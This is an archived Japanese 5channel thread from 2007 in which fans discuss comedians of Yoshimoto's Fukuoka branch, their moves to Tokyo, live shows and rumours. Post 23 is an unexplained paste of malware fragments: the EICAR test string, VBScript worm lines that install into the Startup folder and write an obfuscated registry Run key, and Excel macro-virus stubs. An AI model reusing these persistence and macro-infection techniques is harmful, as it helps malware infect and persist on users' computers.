5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

福岡吉本

1 :名無しさん :2007/01/17(水) 22:53:21
情報交換しながら福吉を見守っていきましょう。
マターリsage進行でお願いします。(メール欄に半角でsageと入れて下さい)
※芸人のプライベートを書いたり人を中傷する場所ではございません。
面白い、面白くないと 感じるのは人それぞれですので激しく言い争わぬよう。
迷惑行為はやめて下さい。煽り、荒らしはスルーで。
公式サイト
ttp://www.yoshimoto.co.jp/fukuoka/new_fukuoka/index02.html

2 :名無しさん :2007/01/17(水) 22:54:47
東京に行った元福岡吉本芸人

バッドボーイズ/03年3月卒業
どりあんず/04年3月卒業
博多 華丸・大吉/05年3月卒業
初恋タロー/06年3月卒業(高森敬太&まつのこうすけ)
パンクブーブー
カンニング/サンミュージック
ヒロシ/サンミュージック
スパローズ/浅井企画


3 :名無しさん:2007/01/17(水) 22:57:27
赤嶺タンのものまね大好き

4 :名無しさん:2007/01/18(木) 10:06:33
チング大好き(>_<)
バリかっこいい

5 :名無しさん:2007/01/18(木) 10:23:32
福岡の恥
スレとか立てるな

6 :名無しさん :2007/01/19(金) 18:26:40
最近は誰がおもしろいの?

7 :名無しさん:2007/01/24(水) 00:11:26
2>>Catch!もじゃね?

8 :名無しさん@板分割議論中:2007/01/26(金) 13:48:14
こんにちはー
なんか福吉スレ見つけて入ったんですけど あんまり盛り上がってないですね、残念
わたしたまにライブ行きますけど チングさんが好きかな!

9 :名無しさん@板分割議論中:2007/01/26(金) 20:56:19
大吉さん結婚おめでとう!!
あんたいい男だぜ!!


10 :名無しさん@板分割議論中:2007/01/27(土) 22:57:44
ageます!!
福岡吉本をもっと盛り上げて行きましょー!!私的にはもっとTVに出て欲しいです。
桃組がオンバトでオンエアになってたし、もっと出て欲しい!!

11 :名無しさん@板分割議論中:2007/01/27(土) 23:30:43
>>10
地方吉本の中でもダントツだと思うんですけどね
なかなか盛り上がらないのは劇場がないからなんでしょうかね?




12 :名無しさん@板分割議論中:2007/01/28(日) 18:22:52
何年ぶりかにプームー見に親不孝まで行ったら、外にたむろってた娘達にジロジロ見られて恐かたよ。もう行かね。

13 :名無しさん@板分割議論中:2007/01/28(日) 23:20:57
私もプームーさん好き☆
今日行きたかったなぁ…

14 :名無しさん@板分割議論中:2007/01/29(月) 00:35:39
幸薄そうな顔で眼鏡かけてるピン芸人、まだ居る?

15 :名無しさん@板分割議論中:2007/01/29(月) 01:48:40
>>14
水江さんのことかな?
まだいらっしゃいますよ

16 :名無しさん@板分割議論中:2007/01/29(月) 07:54:18
華丸大吉がもうすぐ福岡に帰ってきそうな気がするのは
私だけでしょうか

どーでもいいですよ♪

17 :名無しさん@板分割議論中:2007/01/29(月) 08:07:28
九州人がお笑い?笑わすなってwテレビ出ても標準語、関西弁使ってる時点で終わってるやろw何年立ったら九州弁で漫才するやつ出てくるんやろうな〜

18 :名無しさん@板分割議論中:2007/01/29(月) 08:15:12
九州弁を 分かる奴が少ないもんなー
大阪で華大が漫才してたテレビがあったけど
九州弁で話したとこ みんな意味わからずシーンとなってた

九州の自分は笑ったが 

19 :名無しさん@板分割議論中:2007/01/29(月) 10:26:21
華大帰って来てイベント復活させてくれ。また人力芸人呼んでくれ。

博多弁で漫才・コントやってるのも東京には何組か居るよ。
そりゃネタ中全部やないけども。通じないし。

20 :名無しさん@板分割議論中:2007/02/02(金) 01:59:21
この前久しぶりにイベント見に行ったらなんか前と雰囲気かわってますね。
スタッフが客とワイワイ話したりしてるしw
なんかグダグタなカンジ。

21 :名無しさん@板分割議論中:2007/02/02(金) 18:31:10
スタッフが話してるの相手なら招待客だろ。ファンなんて毎回10人そこらなんだからさ…。
潰れるぞマジで。

22 :名無しさん@板分割議論中:2007/02/03(土) 16:47:31
age

23 :名無しさん@板分割議論中:2007/02/03(土) 19:37:03
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


24 :名無しさん@板分割議論中:2007/02/04(日) 00:55:16
空とぶヒヨコとかにも出てますね


25 :名無しさん@板分割議論中:2007/02/04(日) 09:48:16
新天町でのチケットの手売りとかってまだやってるのかなぁ?

26 :名無しさん@板分割議論中:2007/02/04(日) 10:31:53
福岡吉本は完全に終わってるな。高田課長とかケン防は面白くない代表格。どうにかしないとな

27 :名無しさん@板分割議論中:2007/02/04(日) 13:01:36
まだ手売りやってんの?
前は社員がNG出したりしてたし、分かんね。

28 :名無しさん@板分割議論中:2007/02/07(水) 17:55:58
どんぴしゃって期待されてるけど、売れる気全くしないのはおいらだけ(´・ω・`)

29 :名無しさん@板分割議論中:2007/02/08(木) 22:57:24
どんぴしゃエンタのオーディション受けるらしいですよ

30 :名無しさん@板分割議論中:2007/02/09(金) 23:32:17
福岡吉本で誰が一番売れそう??

31 :名無しさん@板分割議論中:2007/02/10(土) 16:06:39
竹尾って男のピン芸人。唯一期待してる。頑張れ。

32 :名無しさん@板分割議論中:2007/02/11(日) 01:05:54
生光かな 勢いみたいなとこもあるけど面白い

33 :天才芸人:2007/02/11(日) 06:38:47
福岡吉本ってそんなにヤバイんだ。でも俺が入ればマシになると思うよ。
今年の夏のオーディション受けるからヨロシク。

34 :名無しさん@板分割議論中:2007/02/11(日) 13:26:59
>>33
頑張って!

35 :名無しさん@板分割議論中:2007/02/15(木) 15:48:06
やっぱ、コンバット満でしょ

36 :名無しさん@板分割議論中:2007/02/15(木) 16:43:45
どんぴしゃ来年東京進出決定

37 :名無しさん@板分割議論中:2007/02/15(木) 20:18:16
>>うっそーん!?(泣)
確か生光もそんな噂あるよね。

38 :名無しさん@板分割議論中:2007/02/15(木) 20:19:46
>>36うっそーん!?(泣)
確か生光もそんな噂あるよね。

39 :名無しさん@板分割議論中:2007/02/15(木) 20:23:55
コンバット満、俺も好きだw
あとケン坊田中、面白いと思ったことは一度もないが、実際会ったらものすごエエ人やった。

40 :名無しさん@板分割議論中:2007/02/15(木) 22:34:19
バッドボーイズ/03年3月卒業
博多 華丸・大吉/05年3月卒業
パンクブーブー
カンニング/サンミュージック
ヒロシ/サンミュージック

意外知らない。


41 :名無しさん@板分割議論中:2007/02/15(木) 23:41:40
>>36
本当に?
どこ情報?

42 :名無しさん@板分割議論中:2007/02/19(月) 03:59:08
>>33
声の大きさに気を付ければ、
よほど馬鹿なことしないかぎり受かるから、頑張って。
ただ受かったあとが大変よ?
頑張って夢を掴め!

43 :名無しさん:2007/02/20(火) 03:32:40
チングに水江さんに生光の3組は3月で見納めらしいです・・・

44 :名無しさん:2007/02/20(火) 15:39:58
コンバット満って結婚したの?
子供もいるのか?


45 :名無しさん@板分割議論中:2007/02/20(火) 23:49:47
>>43
(´;ω;`)
3組もですか・・・

46 :名無しさん:2007/02/21(水) 20:55:10
しかもバリバリとゴリゴリの芸人もシャッフルされるね。

47 :名無しさん:2007/02/22(木) 11:39:20
今日は竹山のラジオにケン坊田中が出る

9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)